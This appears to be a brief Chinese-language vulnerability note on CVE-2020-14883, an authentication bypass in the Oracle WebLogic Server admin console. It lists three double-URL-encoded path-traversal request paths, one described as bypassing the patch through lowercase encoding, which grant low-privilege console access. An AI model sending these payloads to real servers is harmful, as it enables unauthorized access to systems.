0day/WebLogic/CVE-2020-14883 未授权访问

weblogic 未授权访问漏洞

远程攻击者可以构造特殊的HTTP请求，在未经身份验证的情况下接管 WebLogic Server Console。权限绕过漏洞（CVE-2020-14883），访问以下URL，未授权访问到管理后台页面（低权限的用户）

/console/images/%252E%252E%252Fconsole.portal
/console/css/%252e%252e%252fconsole.portal  （小写可绕过补丁）
/console/css/%25%32%65%25%32%65%25%32%66console.portal

此时的权限很低，并不能在后台安装应用